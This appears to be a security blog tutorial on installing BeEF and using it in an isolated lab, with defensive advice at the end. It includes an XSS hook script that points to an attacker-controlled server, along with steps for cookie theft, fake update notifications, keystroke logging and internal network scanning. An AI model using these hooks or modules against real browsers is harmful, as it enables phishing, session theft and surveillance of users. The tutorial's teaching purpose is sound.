Ethical Hacking #beef#xss#browser-exploitation

BeEF Browser Exploitation Framework: Lab Guide

Set up BeEF XSS framework, hook browsers, use exploitation modules, and practice browser-based attacks ethically in an isolated lab environment.

7 min read

BeEF Browser Exploitation Framework: Lab Setup and Usage Guide

BeEF (Browser Exploitation Framework) is an open-source penetration testing tool focused on exploiting vulnerabilities in web browsers. While most security tools attack the network perimeter or the server, BeEF targets what is often the weakest link: the end user’s browser. Security professionals use BeEF to demonstrate the real-world impact of Cross-Site Scripting (XSS) vulnerabilities in authorized assessments and training labs.

Legal and ethical notice: BeEF must only be used in isolated lab environments or against systems you have explicit written permission to test. Hooking someone else’s browser without consent is a criminal offense in most jurisdictions.

How BeEF Works

BeEF operates through a concept called hooked browsers. When a target visits a page containing the BeEF hook script, their browser connects to your BeEF server and remains under your command-and-control interface. You can then run modules — JavaScript-based commands — against the hooked browser without any additional interaction from the victim.

The hook is a single JavaScript tag:

<script src="http://YOUR_BEEF_IP:3000/hook.js"></script>

This script is injected into vulnerable pages via XSS, social engineering, or a controlled lab test page.

Installation

On Kali Linux (Pre-installed)

# Start BeEF directly
cd /usr/share/beef-xss
sudo ./beef

Manual Installation (Ubuntu/Debian)

# Install dependencies
sudo apt update
sudo apt install ruby ruby-dev build-essential libssl-dev libreadline-dev \
    zlib1g-dev nodejs npm git curl -y

# Clone BeEF
git clone https://github.com/beefproject/beef.git
cd beef

# Install Ruby gems
sudo gem install bundler
bundle install

# Run BeEF
./beef

On first run, BeEF prompts you to change the default credentials. Always do this — the defaults (beef/beef) are publicly known.

Configuration

The main config file is config.yaml in the BeEF root:

beef:
  credentials:
    user: "admin"
    passwd: "YourStrongPassword!"
  http:
    host: "0.0.0.0"
    port: 3000
    public: ""   # Set to your public IP if running behind NAT

After saving, restart BeEF.

Accessing the Web UI

Once BeEF starts, it outputs two URLs:

[*] BeEF is loading...
[*] UI URL:   http://127.0.0.1:3000/ui/panel
[*] Hook URL: http://127.0.0.1:3000/hook.js

Open the UI URL in your browser and log in with your credentials. The dashboard shows:

  • Online Browsers — actively hooked sessions
  • Offline Browsers — previously hooked sessions
  • Module Tree — all available exploitation modules
  • Logs — real-time event stream

Setting Up a Lab Test Page

Create a simple HTML page that loads the hook in your controlled lab:

<!DOCTYPE html>
<html>
<head>
    <title>Demo Page</title>
</head>
<body>
    <h1>Welcome to the Lab Test Page</h1>
    <p>This simulates a vulnerable web application.</p>
    <!-- BeEF hook injection point (simulates XSS) -->
    <script src="http://192.168.1.100:3000/hook.js"></script>
</body>
</html>

Serve it locally:

python3 -m http.server 8080

Open the page in a test VM’s browser. Within seconds, the browser appears in BeEF’s Online Browsers panel.

Exploring the Module Tree

BeEF organizes modules into categories:

CategoryDescription
NetworkLAN discovery, port scanning via browser
BrowserFingerprinting, plugin detection, history theft
Social EngineeringFake update dialogs, credential phishing overlays
HostDetect OS, screen size, clipboard content
User InterfaceAlert boxes, fake notifications, tab operations
MiscWebRTC IP leak, geolocation, camera access (with permission prompt)

Commonly Used Modules

Browser Fingerprinting

In the module tree, navigate to Browser > Hooked Domain > Get Cookie. This retrieves cookies accessible from JavaScript (those without the HttpOnly flag set).

Navigate to Browser > Fingerprinting > Get System Info to collect:

  • Browser name, version, and user agent
  • OS type and version
  • Screen resolution
  • Installed plugins (Flash, Java, etc. — legacy)
  • Whether the browser has Java enabled

Social Engineering: Fake Update Notification

One of the most realistic demonstration modules:

  1. Select your hooked browser
  2. Navigate to Social Engineering > Fake Notification Bar (Firefox)
  3. Set the notification message: “Critical security update available. Click here to install.”
  4. Set the URL to your controlled page
  5. Click Execute

The victim sees a realistic browser-style notification bar. This demonstrates why XSS is rated Critical in bug bounties — it enables phishing at the application layer, bypassing all network-layer controls.

Network: Internal Network Fingerprinting

Module: Network > Fingerprint Network

This module uses XMLHttpRequests and image loading tricks to map internal RFC 1918 addresses behind the victim’s browser. It can reveal internal hosts that are not accessible from the internet — a significant pivot opportunity in an authorized red-team scenario.

Redirecting the Browser

Module: Browser > Hooked Domain > Redirect Browser

Set the target URL and execute. The hooked browser navigates to a page of your choice — useful in demonstrations to show the full scope of XSS impact.

Capturing Keystrokes

Module: Host > Get Visited URLs
Module: User Interface > Stream Keystroke Logger

The keystroke logger streams everything typed in the browser window back to your BeEF panel. In a lab context, this powerfully illustrates why session isolation and CSP headers matter.

Using BeEF’s REST API

BeEF exposes a REST API for scripting and integration:

# Get all hooked browsers
curl -s http://127.0.0.1:3000/api/hooks \
  -H "Content-Type: application/json" \
  --data '{"BeEFToken":"YOUR_TOKEN"}'

# Get BeEF token (shown in terminal on startup)
# Or authenticate via:
curl -s -c cookies.txt \
  "http://127.0.0.1:3000/api/admin/login" \
  -d '{"username":"admin","password":"YourPassword"}'

This enables automating module execution in red-team playbooks.

Combining BeEF with Metasploit

BeEF integrates with the Metasploit Framework for browser-specific exploits. Enable the integration in config.yaml:

metasploit:
  enable: true
  host: "127.0.0.1"
  port: 55552
  user: "msf"
  pass: "abc123"

This surfaces Metasploit browser modules directly in BeEF’s module tree — useful for testing whether a hooked browser is vulnerable to known browser engine exploits in an isolated lab VM.

Defensive Insights

Using BeEF in your lab teaches you how to defend against these attacks:

  • Content Security Policy (CSP): A properly configured CSP (script-src 'self') blocks the hook script from loading entirely.
  • HttpOnly cookies: Prevents JavaScript from reading session cookies.
  • X-Frame-Options: Reduces clickjacking vectors that complement XSS.
  • Subresource Integrity (SRI): Ensures CDN-hosted scripts have not been tampered with.
  • Browser sandboxing: Modern browsers restrict cross-origin requests, limiting what hook.js can do.

Run BeEF against your own test application with and without these headers to see the concrete difference.

Summary

BeEF transforms the abstract concept of XSS into a live command-and-control demonstration. Setting it up in a lab and walking through modules — fingerprinting, social engineering overlays, internal network scanning — builds deep intuition for why XSS vulnerabilities deserve Critical severity ratings. The framework is most valuable as an educational tool that makes attack surface visible, which directly informs better defensive architecture decisions.

#penetration-testing #web-security #browser-exploitation #xss #beef

// related articles

ethical-hacking OWASP Top 10 2021: Complete Security Guide 7 min read ethical-hacking Gobuster Directory Enumeration Tutorial 8 min read ethical-hacking XSS Cross-Site Scripting Explained 10 min read